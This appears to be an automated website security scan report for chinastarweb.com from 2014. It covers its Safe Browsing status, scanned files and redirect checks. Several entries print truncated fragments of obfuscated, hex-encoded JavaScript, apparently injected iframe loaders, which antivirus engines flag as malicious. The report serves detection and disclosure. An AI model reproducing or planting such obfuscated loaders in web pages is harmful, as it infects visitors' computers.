Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=chinastarweb.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://chinastarweb.com/ | 200 OK Content-Length: 20100 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) vvrho="spl"+"i"+"t";hfg=window;dnyao="0"+"x";eip=(5-3-1);try{--(document["body"])}catch(mhqnmd){bytbr=false;try{}catch(rlaka){bytbr=21;}if(1){idsyzc="17:5d:6c:65:5a:6b:60:66:65:17:6d:5d:60:61:5b:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6d:5d:60:61:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20 Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://chinastarweb.com/doteasy-under-construction/fancybox/jquery.fancybox.js | 200 OK Content-Length: 6260 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) wkkhe=String;myolx="spl"+"i"+"t";dfpi=window;puvoy=(1)?"0x":"123";csqz=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(qox){mslrpz=false;try{}catch(zstjb){mslrpz=21;}if(1){mibphz="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq68Zq70Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq68Zq Antivirus reports:
| ||
http://chinastarweb.com/doteasy-under-construction/fancybox/helpers/jquery.fancybox-media.js | 200 OK Content-Length: 11384 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function ($) { "use strict"; var F = $.fancybox, format = function( url, rez, params ) { params = params || ''; if ( $.type( params ) === "object" ) { params = $.param(params, true); } $.each(rez, function(key, value) { url = url.replace( '$' + key, value || '' ); }); if (params.length) { url += ( url.indexOf('?') > 0 ? '&' : '?' ) + params; } return url; }; F.helpers.media = { Antivirus reports:
| ||
http://chinastarweb.com/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Thu, 10 Apr 2014 21:18:12 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/errorpages/error404/ | 200 OK Content-Length: 10669 Content-Type: text/html | clean |
http://templates.doteasy.com/errorpages/error404/../js/selectBox/jquery.selectBox.min.js | 200 OK Content-Length: 12728 Content-Type: application/x-javascript | clean |
http://chinastarweb.com/../js/jquery.watermark.min.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
http://chinastarweb.com/../js/fancybox/jquery.fancybox.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
http://chinastarweb.com/../js/fancybox/helpers/jquery.fancybox-media.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: chinastarweb.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 10 Apr 2014 21:18:09 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 20100
Content-Type: text/html
Last-Modified: Sat, 11 Jan 2014 17:27:00 GMT
...20100 bytes of data.
GET / HTTP/1.1
Host: chinastarweb.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 10 Apr 2014 21:18:09 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 20100
Content-Type: text/html
Last-Modified: Sat, 11 Jan 2014 17:27:00 GMT
...20100 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: chinastarweb.com
Referer: http://www.google.com/search?q=chinastarweb.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: chinastarweb.com
Referer: http://www.google.com/search?q=chinastarweb.com
Result:
The result is similar to the first query. There are no suspicious redirects found.